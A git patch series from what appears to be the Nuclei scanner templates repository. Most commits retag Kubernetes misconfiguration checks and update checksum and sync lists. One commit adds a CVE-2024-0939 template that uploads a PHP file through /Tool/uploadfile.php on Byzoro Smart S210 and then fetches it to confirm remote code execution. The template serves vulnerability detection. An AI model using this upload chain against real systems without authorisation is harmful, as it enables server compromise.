diff --git a/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml index 989b5b2759..9211eecb08 100644 --- a/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml +++ b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml @@ -11,7 +11,7 @@ info: Use specific image tags for all containers in Kubernetes Deployments to ensure reproducibility and stability of application deployments. reference: - https://kubernetes.io/docs/concepts/containers/images/ - tags: cloud,devops,kubernetes,k8s,devsecops,deployments + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml index dc4f612553..2039d0acf3 100644 --- a/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml +++ b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml @@ -10,7 +10,7 @@ info: remediation: Configure liveness probes for all containers in Kubernetes Deployments to ensure proper health checks and automatic restarts of failing containers reference: - https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/ - tags: cloud,devops,kubernetes,k8s,devsecops,deployments + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml index c8d50de6d9..b528dc243b 100644 --- a/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml @@ -10,7 +10,7 @@ info: remediation: Set memory limits for all containers in Kubernetes Deployments to ensure resource management and application stability reference: - https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/ - tags: cloud,devops,kubernetes,k8s,devsecops,deployments + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml b/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml index 2f83e31698..e4913e6095 100644 --- a/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml @@ -10,7 +10,7 @@ info: remediation: Set memory requests for all containers in Kubernetes Deployments to ensure efficient pod scheduling and node resource utilization. reference: - https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/ - tags: cloud,devops,kubernetes,k8s,devsecops,deployments + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml b/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml index 6da198f43a..991f396b89 100644 --- a/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml +++ b/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml @@ -11,7 +11,7 @@ info: Ensure that no unnecessary capabilities are added to containers within Kubernetes Deployments. Use security contexts to define the minimum necessary privileges. reference: - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ - tags: cloud,devops,kubernetes,k8s,devsecops,deployments + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-privileged-container.yaml b/cloud/kubernetes/deployments/k8s-privileged-container.yaml index b37e429c23..d8310da838 100644 --- a/cloud/kubernetes/deployments/k8s-privileged-container.yaml +++ b/cloud/kubernetes/deployments/k8s-privileged-container.yaml @@ -11,7 +11,7 @@ info: Ensure that no container in Kubernetes Deployments runs in privileged mode, as the root user, or with privilege escalation enabled. Modify the security context for each container to set `privileged: false`, `runAsUser` appropriately, and `allowPrivilegeEscalation: false`. reference: - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged - tags: cloud,devops,kubernetes,k8s,devsecops,deployments + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml b/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml index de141bb4dc..b29761b8a3 100644 --- a/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml @@ -11,7 +11,7 @@ info: Define readiness probes in all containers within your Kubernetes Deployments to ensure that traffic is only routed to containers that are fully prepared to handle it. reference: - https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/ - tags: cloud,devops,kubernetes,k8s,devsecops,deployments + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-root-container-admission.yaml b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml index 6dedcd1369..dd59064962 100644 --- a/cloud/kubernetes/deployments/k8s-root-container-admission.yaml +++ b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml @@ -11,7 +11,7 @@ info: Configure security contexts for all pods to run containers with a non-root user. Use Pod Security Policies or OPA/Gatekeeper to enforce these configurations. reference: - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#users-and-groups - tags: cloud,devops,kubernetes,devsecops,deployments,k8s + tags: cloud,devops,kubernetes,devsecops,deployments,k8s,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml index b59ecb43f6..1a331a788a 100644 --- a/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml +++ b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml @@ -11,7 +11,7 @@ info: Ensure that all containers in Kubernetes Deployments have a seccomp profile of docker/default or runtime/default set in their security contexts. reference: - https://kubernetes.io/docs/tutorials/clusters/seccomp/ - tags: cloud,devops,kubernetes,security,devsecops,containers + tags: cloud,devops,kubernetes,devsecops,containers,k8s,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/kubernetes-code-env.yaml b/cloud/kubernetes/kubernetes-code-env.yaml index ffcff48ad9..8c5a34b874 100644 --- a/cloud/kubernetes/kubernetes-code-env.yaml +++ b/cloud/kubernetes/kubernetes-code-env.yaml @@ -7,7 +7,7 @@ info: Checks if kubernetes CLI is set up and all necessary tools are installed on the environment. reference: - https://kubernetes.io/ - tags: cloud,devops,kubernetes,k8s,kubernetes-cloud-config + tags: cloud,devops,kubernetes,k8s,k8s-cluster-security self-contained: true code: diff --git a/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml index f08f42535b..c053894af2 100644 --- a/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml +++ b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml @@ -10,7 +10,7 @@ info: remediation: Define egress rules in all network policies to control outbound traffic from your Kubernetes pods, thereby reducing security risks. reference: - https://kubernetes.io/docs/concepts/services-networking/network-policies/ - tags: cloud,devops,kubernetes,security,devsecops,network + tags: cloud,devops,kubernetes,devsecops,k8s,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml b/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml index 2051aae380..349b01076e 100644 --- a/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml +++ b/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml @@ -11,7 +11,7 @@ info: Ensure that all Network Policies explicitly define a namespace to maintain proper network isolation and security boundaries. reference: - https://kubernetes.io/docs/concepts/services-networking/network-policies/ - tags: cloud,devops,kubernetes,security,devsecops,networking + tags: cloud,devops,kubernetes,devsecops,k8s,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml index f0d245847d..954d2348ae 100644 --- a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml +++ b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml @@ -11,7 +11,7 @@ info: Define specific ingress rules in all network policies to control the flow of inbound traffic to pods, ensuring only authorized traffic can access cluster resources. reference: - https://kubernetes.io/docs/concepts/services-networking/network-policies/ - tags: cloud,devops,kubernetes,security,networking + tags: cloud,devops,kubernetes,security,k8s,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml index aaef1e10e3..b9e717d392 100644 --- a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml +++ b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml @@ -10,7 +10,7 @@ info: remediation: Ensure that the allowPrivilegeEscalation flag is set to false in all container configurations to minimize security risks reference: - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ - tags: cloud,devops,kubernetes,security,devsecops,containers + tags: cloud,devops,kubernetes,security,devsecops,containers,k8s,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml index ead59c806a..b449495d9f 100644 --- a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml +++ b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml @@ -10,7 +10,7 @@ info: remediation: Ensure that no container in Kubernetes Pods is set to share the host IPC namespace. Configure 'spec.hostIPC' to 'false' for all pods to isolate IPC namespaces. reference: - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ - tags: cloud,devops,kubernetes,k8s,devsecops,pods + tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml index a98680cc00..2bc9bd222d 100644 --- a/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml +++ b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml @@ -11,7 +11,7 @@ info: Ensure that the 'hostNetwork' field is set to false in all Kubernetes Pods to prevent containers from sharing the host's network namespace. reference: - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces - tags: cloud,devops,kubernetes,k8s,devsecops,namespace + tags: cloud,devops,kubernetes,k8s,devsecops,namespace,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml index e9386f6075..55296d3fc8 100644 --- a/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml +++ b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml @@ -11,7 +11,7 @@ info: Ensure that the 'hostPID' field is set to 'false' in Kubernetes Pod specifications to prevent containers from sharing the host's PID namespace. reference: - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces - tags: cloud,devops,kubernetes,k8s,devsecops,pods + tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/pods/k8s-readonly-fs.yaml b/cloud/kubernetes/pods/k8s-readonly-fs.yaml index 520aeb5a84..24312b1075 100644 --- a/cloud/kubernetes/pods/k8s-readonly-fs.yaml +++ b/cloud/kubernetes/pods/k8s-readonly-fs.yaml @@ -10,7 +10,7 @@ info: remediation: Configure containers to use read-only filesystems where possible to enhance security and minimize risk of unauthorized data modification reference: - https://kubernetes.io/docs/concepts/storage/volumes/#mount-propagation - tags: cloud,devops,kubernetes,k8s,devsecops,pods + tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml index 8f59478b73..3bbef35dbe 100644 --- a/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml +++ b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml @@ -11,7 +11,7 @@ info: Configure all pods and containers to have their root filesystem set to read-only mode. This can be achieved by setting the securityContext.readOnlyRootFilesystem parameter to true in the pod or container configuration. reference: - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems - tags: cloud,devops,kubernetes,security,devsecops,pods,k8s + tags: cloud,devops,kubernetes,devsecops,pods,k8s,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/pods/k8s-root-user-id.yaml b/cloud/kubernetes/pods/k8s-root-user-id.yaml index e2cd9a2db3..666e61a880 100644 --- a/cloud/kubernetes/pods/k8s-root-user-id.yaml +++ b/cloud/kubernetes/pods/k8s-root-user-id.yaml @@ -10,7 +10,7 @@ info: remediation: Configure pods to run with a non-root user ID by setting the 'securityContext' for each container and the pod itself. reference: - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ - tags: cloud,devops,kubernetes,security,devsecops,pods + tags: cloud,devops,kubernetes,devsecops,pods,k8s,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml index d705b4bd37..9b0af09a50 100644 --- a/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml @@ -11,7 +11,7 @@ info: Configure the Kubernetes API server to include the audit-log-path argument pointing to a secure, writeable directory where audit logs will be stored. Ensure that this directory is properly secured and regularly monitored. reference: - https://kubernetes.io/docs/tasks/debug-application-cluster/audit/ - tags: cloud,devops,kubernetes,security,devsecops,api-server + tags: cloud,devops,kubernetes,devsecops,api-server,k8s,k8s-cluster-security variables: argument: "audit-log-path" diff --git a/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml index b755b9ff12..ac271d1834 100644 --- a/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml +++ b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml @@ -11,7 +11,7 @@ info: Ensure that the encryption provider configuration file is set up correctly and referenced properly in the API server configuration. Encryption should be enabled and configured according to the security best practices. reference: - https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/ - tags: cloud,devops,kubernetes,security,devsecops,encryption + tags: cloud,devops,kubernetes,devsecops,encryption,k8s,k8s-cluster-security variables: argument: "encryption-provider-config" diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml index 6607c49e47..1c8a9f4cd5 100644 --- a/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml @@ -11,7 +11,7 @@ info: Configure etcd to use an etcd-cafile argument that points to a valid CA certificate bundle. This setting should be part of the etcd startup arguments or in its configuration file. reference: - https://etcd.io/docs/v3.5/op-guide/security/ - tags: cloud,devops,kubernetes,security,devsecops,etcd + tags: cloud,devops,kubernetes,devsecops,etcd,k8s,k8s-cluster-security variables: argument: "etcd-cafile" diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml index 7a6160556f..fa66bcccb1 100644 --- a/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml @@ -11,7 +11,7 @@ info: Configure the etcd server to use etcd-certfile and etcd-keyfile arguments that point to valid certificate and key files respectively. This ensures that communications to and from the etcd server are properly encrypted. reference: - https://etcd.io/docs/v3.4.0/op-guide/security/ - tags: cloud,devops,kubernetes,security,devsecops,etcd + tags: cloud,devops,kubernetes,devsecops,etcd,k8s,k8s-cluster-security variables: argument: "etcd-certfile or etcd-keyfile" diff --git a/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml index a16b69c46b..8a8e1b3ccd 100644 --- a/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml +++ b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml @@ -11,7 +11,7 @@ info: Implement and use namespaces to organize resources within the Kubernetes cluster effectively. Define access controls and resource quotas on a per-namespace basis. reference: - https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/ - tags: cloud,devops,kubernetes,security,devsecops,namespaces + tags: cloud,devops,kubernetes,devsecops,namespaces,k8s,k8s-cluster-security variables: argument: "namespaces" diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml index ac65cadc8e..9086abfb7c 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml @@ -11,7 +11,7 @@ info: Set the service-account-issuer argument to a valid issuer URL in the API server's startup arguments or configuration file. This ensures the tokens issued are trusted across services. reference: - https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/ - tags: cloud,devops,kubernetes,security,devsecops,api-server + tags: cloud,devops,kubernetes,devsecops,api-server,k8s,k8s-cluster-security variables: argument: "service-account-issuer" diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml index 297ea44109..25e93ee840 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml @@ -11,7 +11,7 @@ info: Configure the API server to use a service-account-key-file that points to a valid private key used to sign service account tokens. This setting should be part of the API server startup arguments or in its configuration file. reference: - https://kubernetes.io/docs/admin/kube-apiserver/ - tags: cloud,devops,kubernetes,security,devsecops,api-server + tags: cloud,devops,kubernetes,security,devsecops,api-server,k8s,k8s-cluster-security variables: argument: "service-account-key-file" diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml index 5168e9aaf8..e628964fbf 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml @@ -11,7 +11,7 @@ info: Set the service-account-lookup argument to true in the API server's startup arguments or configuration file to ensure proper verification of service accounts. reference: - https://kubernetes.io/docs/admin/kube-apiserver/ - tags: cloud,devops,kubernetes,security,devsecops,api-server + tags: cloud,devops,kubernetes,security,devsecops,api-server,k8s,k8s-cluster-security variables: argument: "service-account-lookup=true" diff --git a/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml index 30b5c65b75..b55ff705c9 100644 --- a/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml @@ -11,7 +11,7 @@ info: Configure the API server to use tls-cert-file and tls-private-key-file that point to a valid certificate and key file respectively. This setting should be part of the API server startup arguments or in its configuration file. reference: - https://kubernetes.io/docs/admin/kube-apiserver/ - tags: cloud,devops,kubernetes,security,devsecops,api-server + tags: cloud,devops,kubernetes,security,devsecops,api-server,k8s,k8s-cluster-security variables: argument: "tls-cert-file or tls-private-key-file" diff --git a/profiles/k8s-cluster-security.yml b/profiles/k8s-cluster-security.yml new file mode 100644 index 0000000000..bca020c786 --- /dev/null +++ b/profiles/k8s-cluster-security.yml @@ -0,0 +1,6 @@ +# Nuclei scan profile for scanning aws ACLs + +code: true # enable code templates + +tags: + - k8s-cluster-security # filter templates with "k8s-cluster-security" tags \ No newline at end of file From 4d9ff5c45abcedc1d3d20d52993197830b7a84f2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 18 Jun 2024 17:47:08 +0530 Subject: [PATCH 0354/1841] fix trail space --- http/default-logins/mantisbt/mantisbt-default-credential.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/mantisbt/mantisbt-default-credential.yaml b/http/default-logins/mantisbt/mantisbt-default-credential.yaml index 527a3b0906..042edf3563 100644 --- a/http/default-logins/mantisbt/mantisbt-default-credential.yaml +++ b/http/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -58,7 +58,7 @@ http: - type: regex part: header_3 regex: - - "Location: .*?/login_cookie_test.php\\?return=account_page.php" + - "Location: .*?/login_cookie_test.php\\?return=account_page.php" - type: status status: From b3f4a112c75d7027ab05655ae11f2efccab231fb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 18 Jun 2024 18:35:24 +0530 Subject: [PATCH 0355/1841] Create CVE-2024-0939.yaml --- http/cves/2024/CVE-2024-0939.yaml | 69 +++++++++++++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 http/cves/2024/CVE-2024-0939.yaml diff --git a/http/cves/2024/CVE-2024-0939.yaml b/http/cves/2024/CVE-2024-0939.yaml new file mode 100644 index 0000000000..d9c475076c --- /dev/null +++ b/http/cves/2024/CVE-2024-0939.yaml @@ -0,0 +1,69 @@ +id: CVE-2024-0939 + +info: + name: Smart S210 Management Platform - Arbitary File Upload + author: DhiyaneshDk + severity: critical + description: | + A vulnerability has been found in Byzoro Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-0939 + - https://vuldb.com/?ctiid.252184 + - https://vuldb.com/?id.252184 + - https://vuldb.com/?submit.269268 + - https://github.com/tanjiti/sec_profile + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-0939 + cwe-id: CWE-434 + epss-score: 0.00063 + epss-percentile: 0.2659 + cpe: cpe:2.3:o:byzoro:smart_s210_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: byzoro + product: smart_s210_firmware + fofa-query: body="Smart管理平台" + tags: cve,cve2024,smart,file-upload,intrusive,rce + +variables: + filename: "{{to_lower(rand_text_alpha(5))}}" + num1: "{{rand_int(800000, 999999)}}" + num2: "{{rand_int(800000, 999999)}}" + result: "{{to_number(num1)*to_number(num2)}}" + +http: + - raw: + - | + POST /Tool/uploadfile.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywnsogfin + Accept-Encoding: gzip, deflate, br + + ------WebKitFormBoundarywnsogfin + Content-Disposition: form-data; name="file_upload"; filename="contents.php" + Content-Type: application/octet-stream + + <?php print({{num1}}*{{num2}}); ?> + ------WebKitFormBoundarywnsogfin + Content-Disposition: form-data; name="txt_path" + + /home/{{filename}}.php + ------WebKitFormBoundarywnsogfin-- + + - | + GET /home/{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '{{result}}' + + - type: status + status: + - 200 From 0073635b6b8c2ce19232ec84559c00ac2c4f4abf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 18 Jun 2024 18:37:41 +0530 Subject: [PATCH 0356/1841] fix trail space --- http/cves/2024/CVE-2024-0939.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-0939.yaml b/http/cves/2024/CVE-2024-0939.yaml index d9c475076c..7d242e4f1b 100644 --- a/http/cves/2024/CVE-2024-0939.yaml +++ b/http/cves/2024/CVE-2024-0939.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDk severity: critical description: | - A vulnerability has been found in Byzoro Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. + A vulnerability has been found in Byzoro Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-0939 - https://vuldb.com/?ctiid.252184 From a7e5f6953aa295b5907cb60f128dba31f5a49d90 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 13:09:01 +0000 Subject: [PATCH 0357/1841] Auto Generated New Template Addition List [Tue Jun 18 13:09:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fc72aa24e6..9a469af7b8 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-1728.yaml http/cves/2024/CVE-2024-23692.yaml http/cves/2024/CVE-2024-2621.yaml +http/cves/2024/CVE-2024-27718.yaml http/cves/2024/CVE-2024-28995.yaml http/cves/2024/CVE-2024-31750.yaml http/cves/2024/CVE-2024-32113.yaml From 1cc8f5c09d3a00bb1e8c7a7fa514e8e245a33563 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 13:09:55 +0000 Subject: [PATCH 0358/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 222f4679d8..534ae7607a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,6 +18,7 @@ on: - 'http/cves/2024/CVE-2024-1728.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/cves/2024/CVE-2024-2621.yaml' + - 'http/cves/2024/CVE-2024-27718.yaml' - 'http/cves/2024/CVE-2024-28995.yaml' - 'http/cves/2024/CVE-2024-31750.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' From 753e09e8f9f543c7dea8d38add97728168aa19cf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 13:09:58 +0000 Subject: [PATCH 0359/1841] Auto Generated Templates Checksum [Tue Jun 18 13:09:58 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dd87d0aba6..82a8cd0211 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3274,7 +3274,7 @@ http/cves/2024/CVE-2024-1209.yaml:2951e4131bf7866fb91570a8d7d12ecd316a68da http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:6b1a4784714777f96940e0a8ee7a02b8f92922a4 http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f -http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab +http/cves/2024/CVE-2024-1561.yaml:53b3228299aea173f6ab29568f10a35688b615ba http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46 @@ -3305,6 +3305,7 @@ http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27348.yaml:6af6e5ad3b0eae4fa48d1937d51d5a5b767395b5 http/cves/2024/CVE-2024-27497.yaml:b898a9ccd9f6528a3d1ad4b1b9660b12752104e1 http/cves/2024/CVE-2024-27564.yaml:0b9367bff756ebc5d7db5a742305272ac13f37b1 +http/cves/2024/CVE-2024-27718.yaml:3dc9d8fd8a0bc4155d74128d7f3361b95f71e848 http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 @@ -7659,7 +7660,7 @@ http/vulnerabilities/gitlab/gitlab-rce.yaml:173dd50897b2956f85fce08f9730f740415e http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:969333f355e024ef605152fe26bb45511f20f4ad http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:8d551aa4f723d8e79ee57beb2f491c86f5b6cffc http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:83312ba18791464992c70dd4fe10965ba1ed2244 -http/vulnerabilities/gradio/gradio-lfi.yaml:a69850b3a69de67b39650086e3b710acd4ae465b +http/vulnerabilities/gradio/gradio-lfi.yaml:9d052b9053b30850ed2b42140a4e54ba3371f804 http/vulnerabilities/gradio/gradio-ssrf.yaml:c0a20caa4fb295071efb720890b54bee093c0fda http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704 http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f @@ -8662,7 +8663,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 